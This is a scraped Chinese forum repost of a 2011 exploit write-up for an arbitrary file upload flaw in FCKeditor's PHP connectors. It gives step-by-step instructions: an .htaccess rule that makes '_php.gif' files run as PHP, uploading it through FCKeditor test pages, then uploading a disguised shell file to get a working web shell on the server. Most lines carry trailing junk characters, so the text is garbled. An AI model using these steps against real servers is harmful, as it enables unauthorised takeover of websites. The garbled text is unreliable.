FCKeditor所有php版本Upload上传漏洞1 }$ k# i) z/ ]9 D
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
" o4 Y3 D8 H- R减小字体 增大字体
) U5 g" n3 M2 F# g# V6 s[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
v# ]/ L% `" E3 |[+] Date: 2011
$ l! A4 Z% ]3 {( y+ D[+] Author : sinesafe.cn* Y0 c) |5 z7 [7 w* N% [/ G8 A/ ?
[+] Website : WwW.sinesafe.cn" C: [) G5 g1 v$ ?
———————————————————8 d6 a. `1 l4 ^1 P/ q6 x
1.create a htaccess file:
% f1 r3 y0 `0 xcode:
) B$ \0 q @7 C/ _& [0 F5 x<FilesMatch “_php.gif”>% o+ f! Z8 A) R: {9 H; j" h
SetHandler application/x-httpd-php" b. m' `8 A0 r7 s, {) N
</FilesMatch>+ L6 Y# e* [$ h6 {& T
/ U' c) y0 G5 q6 l' t* k2.Now upload this htaccess with FCKeditor.( K4 k7 K( R1 l" |
2 f1 ?+ K6 Y8 C8 ihttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html
2 w% ^1 [! d* g5 y3 t
+ {9 d- n% V, p! r; zhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html
4 B1 l1 i, p. [) d" `* `/ c6 j ^
6 _; b' Y$ {9 C———————————————————————————————-2 i0 ?- \: {+ |6 d5 ?
3.Now upload shell.php.gif with FCKeditor." S- x% F6 a% P6 E
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically." l, P* l1 L: D( m( o( K. Q# I
5.http://www.sinesafe.cn/anything/shell_php.gif! x2 I' @( b- O
6.Now shell is available from server. |
$ [9 ?) T0 f9 r% `6 g& S" c( ]+ ^8 k
$ a9 }; S; @* y( {0 i& C |
发表于 2013-10-27 17:25:21
收藏
支持
反对